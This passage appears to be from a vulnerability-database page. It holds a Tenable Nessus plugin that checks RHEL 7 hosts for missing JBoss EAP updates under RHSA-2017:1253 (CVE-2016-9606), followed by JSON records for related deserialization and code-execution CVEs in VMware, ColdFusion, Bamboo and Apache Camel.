The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112257);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1253\");\n\n script_name(english:\"RHEL 7 : JBoss EAP (RHSA-2017:1253)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.14, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. 
KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-core-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-entitymanager-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-envers-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-infinispan-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hornetq-2.3.25-20.SP18_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"httpserver-1.0.8-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-common-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"ironjacamar-common-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-common-spi-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-core-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-core-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-deployers-common-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-jdbc-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-spec-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ironjacamar-validator-eap6-1.0.38-3.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-appclient-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cli-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-client-all-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-clustering-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cmp-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-connector-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-controller-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"jboss-as-controller-client-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-core-security-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-repository-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-scanner-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-http-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-management-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-deployment-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ejb3-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-embedded-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-host-controller-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jacorb-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxr-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxrs-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jdr-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jmx-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jpa-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jsf-7.5.15-1.Final_redhat_3.1.ep6.el7\")) flag++;\n if 
"cpe": ["cpe:/a:vmware:vcenter_orchestrator:5.5.2", "cpe:/a:vmware:vrealize_orchestrator:6.0.2", "cpe:/a:vmware:vrealize_orchestrator:6.0.3", "cpe:/a:vmware:vrealize_orchestrator:6.0.1", "cpe:/a:vmware:vcenter_orchestrator:5.5.2.1", "cpe:/a:vmware:vcenter_orchestrator:5.5", "cpe:/a:vmware:vcenter_orchestrator:5.5.1"], "id": "CVE-2015-6934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6934", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_orchestrator:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_orchestrator:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_orchestrator:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-28T06:39:48", "description": "Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. 
This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-01T08:29:00", "type": "cve", "title": "CVE-2017-11284", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2020-09-04T14:09:00", "cpe": ["cpe:/a:adobe:coldfusion:2016", "cpe:/a:adobe:coldfusion:11.0"], "id": "CVE-2017-11284", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11284", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:coldfusion:2016:update1:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update6:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update9:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update5:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update10:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update3:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:coldfusion:11.0:update7:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update11:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update8:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update12:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update1:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T10:27:30", "description": "Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-03T01:29:00", "type": "cve", "title": "CVE-2015-6576", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6576"], "modified": "2019-05-03T17:33:00", "cpe": [], "id": "CVE-2015-6576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6576", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, 
"cpe23": []}, {"lastseen": "2023-06-03T14:45:06", "description": "Apache Camel's Jackson and JacksonXML unmarshalling operation are vulnerable to Remote Code Execution attacks.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-28T18:59:00", "type": "cve", "title": "CVE-2016-8749", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8749"], "modified": "2019-05-24T11:29:00", "cpe": ["cpe:/a:apache:camel:2.16.2", "cpe:/a:apache:camel:2.17.4", "cpe:/a:apache:camel:2.18.0", "cpe:/a:apache:camel:2.18.1", "cpe:/a:apache:camel:2.16.0", "cpe:/a:apache:camel:2.17.1", "cpe:/a:apache:camel:2.17.2", "cpe:/a:apache:camel:2.17.0", "cpe:/a:apache:camel:2.16.3", "cpe:/a:apache:camel:2.16.1", "cpe:/a:apache:camel:2.17.3", "cpe:/a:apache:camel:2.16.4"], "id": "CVE-2016-8749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8749", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:camel:2.16.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.18.0:*:*:*:*:*:*:*", 
